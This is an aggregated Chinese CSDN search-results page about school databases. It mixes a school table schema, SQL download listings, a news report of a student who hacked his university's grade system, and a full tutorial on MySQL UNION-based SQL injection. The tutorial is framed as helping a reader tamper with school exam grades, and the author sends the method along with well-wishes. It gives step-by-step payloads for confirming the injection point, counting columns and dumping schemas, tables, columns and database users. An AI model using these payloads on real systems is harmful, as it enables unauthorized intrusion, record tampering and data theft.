精华内容
下载资源
问答
  • 学校信息管理系统数据库模型设计
    2021-06-08 18:33:27

    学校信息管理系统数据库模型设计

    一、PD的使用请参考《PowerDesigner的使用》
    二、学校表(School)

    字段名数据类型说明
    schoolIDint主键
    schoolNamevarchar(20)
    schoolCodevarchar(20)

    三、专业表(Majors)

    字段名数据类型说明
    majorsIDint主键
    schoolIDint学校表外键
    majorsNamevarchar(20)
    majorsCodevarchar(20)

    四、年级表(Grade)

    字段名数据类型说明
    gradeIDint主键
    majorsIDint专业表外键
    schoolIDint学校表外键
    gradeNamevarchar(20)
    gradeCodevarchar(20)

    五、班级表(Class)

    字段名数据类型说明
    classIDint主键
    gradeIDint年级表外键
    majorsIDint专业表外键
    schoolIDint学校表外键
    classNamevarchar(20)
    classCodevarchar(20)

    六、学生表(Student)

    字段名数据类型说明
    studentIDint主键
    classIDint班级外键
    gradeIDint年级表外键
    majorsIDint专业表外键
    schoolIDint学校表外键
    studentNamevarchar(20)
    studentSexvarchar(1)
    studentAgevarchar(3)
    studentIDNumbervarchar(18)
    studentAddressvarchar(30)
    studentCodevarchar(20)
    更多相关内容
  • 在此资源中有全国所有学校数据库以及学校的专业划分,很详细找了很久 在此资源中有全国所有学校数据库以及学校的专业划分,很详细找了很久
  • 学校数据库

    2021-02-21 07:25:10
    为了实践SQL查询编写而对学校进行部分建模的数据库 包括: 4+不同的表 跨表字段的数据类型多种多样 通过外键进行表互连 用于为表格生成随机记录的脚本 用于创建数据库和定义架构SQL文件 插入顺序指南:学生之前的...
  • 数据库包含三个表: nobook_city :城市表nobook_school:学校表nobook_schooltype: 学校类型表具体使用方式:导入数据库后,通过省份城市及学校类型进行筛选,并且学校数据表已经设置首字母,所以可以根据首...
  • 全国初中高中学校数据库sql(包含省市地区,已整理,直接导入)
  • 看到很多网上提供的不全,或者估计只留少部分,此数据库根据最新数据进行整理,包含小学、初中、高中 大约27万+条数据,更可以根据自己需要随时通过数据库进行添加,方便教育行业使用,如有疑问可私信我
  • 全国初中高中学校数据库sql(包含省市地区,已整理,直接导入)
  • 全国学校数据库,包含学校名称、地址、地区编码、学校类型。可根据地区编码查询学校。共22w数据。地区编码可下载我的另一个资源:全国省市区数据
  • 学校数据库项目 该项目将通过以下方式连接到在本地主机上运行MySQL服务器: 用户名:admin 密码:密码 (也许移至noSQL,以便我们进行协调?) 并运行网络应用。 我建议按照Django文档中的教程进行操作,以了解...
  • 学校数据库关系图

    2020-11-11 18:33:09
    测试 学校数据库 1.结构图 2.部门表depatment 3.员工表employee 4.学生表student 5.科目表subject 6.分数表score 主键外键关系图

    测试 学校数据库

    1.结构图
    在这里插入图片描述
    2.部门表depatment
    在这里插入图片描述
    3.员工表employee
    在这里插入图片描述
    4.学生表student
    在这里插入图片描述
    5.科目表subject
    在这里插入图片描述
    6.分数表score
    在这里插入图片描述

    主键外键关系图在这里插入图片描述

    展开全文
  • 学校数据库实验

    2018-06-13 11:19:20
    学校数据库课程的实验文档,可能对有些人并没有多大用处,但是对于初学者有一定的参考意义。
  • 高等学校数据库课程教学改革探讨.docx
  • 学校数据库备份数据库备份
  • 根据教育部发布的文件经过自己整理形成可用.sql文件,导入数据库即可使用。包括全国普通高等学校2631所(含独立学院265所)的省市和主管部门信息,可以通过省市查询到高校名称。
  • SCHOOL-DB-WITH-MONGODB 使用MONGODB创建学校数据库
  • 原标题:大四学生“黑”进学校数据库,将5门挂科成绩全部改合格今天小向分享一则趣事,往下看: 概要:【计算机专业学生为了不挂科“黑”进学校数据库,将5门挂科成绩全部改成合格】广东东莞理工学院,软件工程大四...

    原标题:大四学生“黑”进学校数据库,将5门挂科成绩全部改合格

    今天小向分享一则趣事,往下看:

    290b7f6fdff263f1b74f38278db2fd5e.png

    概要:【计算机专业学生为了不挂科“黑”进学校数据库,将5门挂科成绩全部改成合格】广东东莞理工学院,软件工程大四学生周某,利用自己掌握的计算机技能,测算成绩录入工作人员的账号密码,进入学校数据库,修改了5门挂科成绩到合格线以上。学校给予他留校察看12个月的处分。

    39b7b311e1ed61bbdf2cf43ddd17d9b7.png

    一大四学生因5门考试挂科而入侵学校数据库,并修改成绩至合格线以上。

    近日,广东省东莞理工学院发通报称,一大四学生因5门考试挂科而入侵学校数据库,并修改成绩至合格线以上。经研究决定,给予该生留校察看处分,处分期限12个月。

    7月18日,学校一名值班的工作人员向澎湃新闻(www.thepaper.cn)证实了这一消息,并称,事件发生在2017年底。

    东莞理工学院在7月6日发布的这一处分决定中称,该大四学生周某某,系广东人,1996年9月出生,为该校计算机与网络安全学院2014级软件工程学生。2017年12月,该生利用学校教务系统的漏洞,通过所掌握的网络技能入侵数据库,对自己不及格的科目成绩进行修改,使其全部成绩都在合格线以上。

    据《东莞理工学院学生违纪处分办法》第二章第十七条第(一)款的规定,学校经研究决定,给予其留校察看处分,处分期限12个月。

    ba557260151b687c5c878ba5748b8f93.png

    目前,东莞理工学院已经更新了中央认证系统,并升级了账号安全措施。

    该校工作人员表示,6月上旬,计算机与网络安全学院教职工在整理成绩时发现,软件工程专业周某某的成绩在没有任何理由的情况下发生了变动。并且是五门成绩同时发生了变动。而一般来说,修改成绩都需要任课教师向教务提起申请然后教务再对试卷进行审核才会对成绩进行修改,但当学校询问这五门课的任教教师,五门课老师都表示没有向教务提起修改成绩的要求。

    经辅导员约谈,周某某承认了因担心考试成绩影响毕业,遂通过技术手段获取老师的工作账号及密码,登录了学校的教务管理系统,修改了成绩。近日,学校根据学生违纪处分办法和相关程序,通报了最终的处分决定。

    为杜绝此类事件,目前,东莞理工学院已经更新了中央认证系统,并升级了账号安全措施,包括增加通过短信重置密码的功能,要求超过半年没有修改密码的账号强制修改以及增加了验证码验证本人身份的功能。

    网友评论:

    为什么西安交大没处分

    ↓↓↓

    f3a1adee5a3336ff3aa9c202b2d9900d.png

    学校数据库都能黑,为什么考试成绩还会不及格?

    f835fb5260ca2d9a856a6a1599494111.png

    e22a70906b6652f7a3f28a8ab7b8c3d3.png

    (综合自:新浪微博、澎湃新闻、程序员头条)返回搜狐,查看更多

    责任编辑:

    展开全文
  • 数据库设计实例(学校教学管理系统)是指根据用户的需求,在某一具体的数据库管理系统上,设计数据库的结构和建立数据库的过程。数据库系统需要操作系统的支持。 数据库设计是建立数据库及其应用系统的技术,是信息...
  • 最新数据进行整理,包含小学、初中、高中 大约27万+条...导入数据库后,通过省份城市及学校类型进行筛选,并且学校数据表已经设置首字母,所以可以根据首字母快速查找数据库 内含WINDOWS版和MAC版school.sql数据库
  • 最新最全全国高校,省份,城市数据库,0分奉送
  • 最新全国高校数据库信息(包含2854所高校).由于是本人花了很久的时间搞来的劳动成果,再此献给大家。 此文档是sql格式。包含: 院校名称 所在省份 所在地区 所在城市 是否211 是否985 院校举办 (公办/民办) 院校...
  • 大学信息数据库sql

    2018-09-19 14:23:49
    包含了全国的大学信息, 通过省份城市联动方式查看大学和院系
  • 以下具体功能的介绍:(1):用户登录功能:验证用户登录的合法性,本系统分为教师登录和学生登录两种模式,从数据库中匹配相对应的用户信息,成功登录后自动跳转到主菜单页面 (2):用户管理:实现添加操作用户、修改...
  • mysql文件里面是全国高校基本数据,里面有学校名字,高校层次(985,211,普通本科,专科)学校类型(理工,综合,医药,语言,艺术等),高校地区,招生办电话,招生办官网,一切数据是网络爬虫爬取整理sql文件,都可以...
  • 学校学校数据库ppt,绝对精品,数据库原理,浅显易懂学校数据库ppt,绝对精品,数据库原理,浅显易懂数据库ppt,绝对精品,数据库原理,浅显易懂
  • CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者 「专栏简介」:此文章已录入专栏《网络安全快速入门》 前几天,有个粉丝找到我,说是跟同学吹牛逼,要改学校数据库的期末成绩,问我有没有什么...

    「作者主页」:士别三日wyx
    「作者简介」:CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者
    「专栏简介」:此文章已录入专栏《网络安全快速入门》

    前几天,有个粉丝找到我,说是跟同学吹牛逼,要改学校数据库的期末成绩,问我有没有什么好用的工具。

    我说不用工具,有手就行。

    考虑到这件事多多少少有一些风险,索性甩给他一篇联合注入使用教程。

    “方法就在这里,能不能成功,就看你的造化了!”

    一、初识联合注入

    C站规矩:先说是什么,再说为什么。

    这里有一个测试网站(SQLi Labs靶场的第一关),功能很简单:在地址栏中输入用户id,页面返回对应的用户信息。

    比如,我们输入 ?id=1,页面返回id为1的用户名(Dumb)和密码(Dumb):
    在这里插入图片描述
    输入 ?id=2,页面返回id为2的用户名(Angelina)和密码(I-kill-you):
    在这里插入图片描述
    正常情况下,页面只能返回用户信息,不能返回其他信息。

    接下来,我们在地址栏输入联合注入的payload:

    ?id=0' union select 1,version(),@@datadir -- a
    

    页面返回的数据不再是用户名和密码,而是返回了数据库的版本和安装路径:
    在这里插入图片描述
    这违背了网站原本的用意,除了数据库信息以外,我们可以利用联合注入,让页面返回数据库中的所有数据(理论上)。

    看到这里,相信你已经对联合注入有了初步的了解,接下来,我会一步一步的为大家讲解,联合注入究竟是怎么查询到这些数据的。

    二、执行原理

    1. 后台逻辑分析

    测试网站的功能很简单:根据id查询用户名和名:
    在这里插入图片描述
    执行流程分为三步:

    1. 用户输入参数(用户id)
    2. 后台执行SQL(查询用户信息)
    3. 查询结果在前端回显

    在这里插入图片描述
    知道网站的功能逻辑后,我们来了解一下联合注入的核心:union 关键字

    2. 巧用联合查询

    MySQL提供了 union 关键字,连接多个查询语句,并将查询结果合并,即联合查询。

    我们尝试在查询用户信息(id=1)时,使用 union 关键字,连接另外一个查询语句,在地址栏中输入: ?id=1' union select 1,version(),@@datadir -- a

    程序的执行逻辑如下:

    在这里插入图片描述
    仔细观察一下就会发现,我们已经查询到了其他数据,但页面只能展示第一条数据:
    在这里插入图片描述
    想让页面展示第二条数据,可以使用分页,但这里我们使用另外一种方式:空查询。

    提示1:如果不了解联合查询可以查看下面这张流程图,如果看不懂可以自己尝试编写SQL并观察执行结果。
    在这里插入图片描述
    提示2:select 1,version(),@@datadir;是MySQL查询语句的一种特殊形式,里面用到了两个函数:

    • version():返回数据库版本
    • @@datadir:返回数据库安装路径

    如果你不理解这个查询语句的格式,可以在自己的数据库中执行以下几个SQL,并观察结果:

    select database();
    select 1;
    select 1,2,3;
    select 1,database(),version();
    

    3. 空查询

    正常的用户id都是从1开始自增的,如果查询的id为0或者是负数,一定是空查询。

    在地址栏输入:?id=0' union select 1,version(),@@datadir -- a

    程序的执行逻辑如下:
    在这里插入图片描述
    除此之外,我们可以将 union 右侧的查询语句替换成其他内容,以获取数据库中的所有信息。

    以上便是联合查询的基本原理,接下来,我们在实战案例中使用一下联合注入。

    三、实战教程

    还是上面的测试网站(SQLi Labs靶场的第一关),先来测试注入点。

    地址栏输入 ?id=1' and 1 -- a,页面正常显示:
    在这里插入图片描述
    地址栏输入 ?id=1' and 0 -- a,页面异常(空)显示:
    在这里插入图片描述
    确定注入点:单引号字符型注入。

    接下来,开始使用联合注入,地址栏输入以下payload:

    ?id=0' union select 1,2 -- a
    

    页面报错了……字段数不同
    在这里插入图片描述
    MySQL规定,union 关键字连接的两个查询语句,查询的字段数必须保持一致。

    这就意味着,我们在使用联合注入之前,必须先要判断网站的查询语句,查询了几个字段,这里,我们使用 order by 来判断查询的字段数。

    order by 关键字可以按照指定字段排序,如果排序的字段不存在,则会报错。

    利用这一特性,我们可以从第一个字段开始排序,然后是第二个、第三个……,当页面出现报错时,就可以判断出网站的查询字段数。

    先按照第一个字段排序,地址栏输入 ?id=1' order by 1 -- a
    在这里插入图片描述
    再按照第二个字段排序,地址栏输入 ?id=1' order by 2 -- a
    在这里插入图片描述
    再按照第三个字段排序,地址栏输入 ?id=1' order by 3 -- a
    在这里插入图片描述
    再按照第四个字段排序,地址栏输入 ?id=1' order by 4 -- a
    在这里插入图片描述
    第四个字段排序时开始报错,可以确认第四个字段不存在,网站查询语句的查询字段有只有三个。

    字段确定以后,我们就可以使用联合查询了,地址栏输入以下payload:

    ?id=0' union select 1,2,3 -- a
    

    从页面的响应我们可以看到,2和3的位置可以显示出来,1的位置没有显示出来,因此,我们可以在2或者3的位置返回查询结果。
    在这里插入图片描述
    我们将 2 的位置换成一个函数(获取当前使用的数据库),在地址栏输入以下payload:

    ?id=0' union select 1,database(),3 -- a
    

    页面中显示了当前使用的数据库:
    在这里插入图片描述
    接下来,我们在 2 的位置返回查询语句的结果(数据库的所有用户),在地址栏输入以下payload:

    ?id=0' union select 1,(select group_concat(user) from mysql.user),3 -- a
    

    提示:

    • 使用括号包裹SQL,可以让数据库把括号中的内容当做一个整体执行。
    • 字段处使用 group_concat() 函数,可以将查询结果拼接成一个字符串(可以尝试不加此函数来观察页面的响应结果),不了解次函数的同学可以参考我的另一篇文章:MySQL group_concat函数使用详解

    在这里插入图片描述
    我们可以在 2 的位置替换不同的查询语句,来获取数据库中的所有数据。

    接下来,我们整理一下联合注入的使用步骤。

    四、使用步骤

    使用前提:页面有显示位

    比如用户登录成功以后,会在页面中显示用户名等信息。
    需要注意的是,页面中显示的数据必须是动态数据,不能是写死的。

    1. 判断注入点类型

    同时满足以下两个条件:

    ?id=1 and true -- a		正常显示
    ?id=1 and false -- a	空显示
    

    2. 判断字段数

    ?id=1 order by 1 -- a	正常显示
    ?id=1 order by 2 -- a	正常显示
    ?id=1 order by 3 -- a	报错或异常显示(字段数为2)
    

    3. 判断显示位

    ?id=0 union select 1,2,3 -- a
    

    4. 脱库

    脱库就是获取数据库中所有数据的意思,不了解脱库的同学可以参考我的另一篇文章:MySQL脱库原理详解

    爆库

    ?id=-1 union select 1,
    	(select group_concat(schema_name)
         from information_schema.schemata)
    ,3 -- a
    

    爆表

    ?id=-1 union select 1,
    	(select group_concat(table_name)
         from information_schema.tables
    	 where table_schema='security')
    ,3 -- a
    

    爆字段

    ?id=-1 union select 1,
    	(select group_concat(column_name)
         from information_schema.columns
    	 where table_schema='security' and table_name='users')
    ,3 -- a
    

    感谢你的点赞、收藏、评论,我是三日,祝你幸福!

    展开全文
  • 学校管理系统数据库实验.pdf
  • Mysql 创建学校管理数据库

    千次阅读 2019-06-05 00:10:45
    -- 创建数据库 create database m_school charset utf8; -- 设置命令窗口编码格式 set names gbk; -- ----------------------------------------------------------------------- -- 创建学生表 use m_school; ...
  • 数据库系统期中考试

    千次阅读 2020-05-11 12:14:04
    数据库管理系统 B、 数据库系统 C、 数据库 D、 文件系统 我的答案:C 2在数据库中存储的是( )。 A、 数据 B、 数据模型 C、 数据以及数据之间的联系 D、 信息 我的答案:C 3 数据库系统阶段,数据( )。 (2.0分...
  • 数据库复习题之选择题

    万次阅读 2021-05-05 15:16:09
    一些选择题: 数据库管理系统(DBMS)的主要功能是 。 A.修改数据库 B.定义数据库 C.应用数据库D.保护数据库 ...数据库系统的特点是 、数据独立、减少数据...数据库管理系统能实现对数据库中数据的查询、插入、修...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 90,586
精华内容 36,234
关键字:

学校数据库

友情链接: Dajetime-milliseconds.rar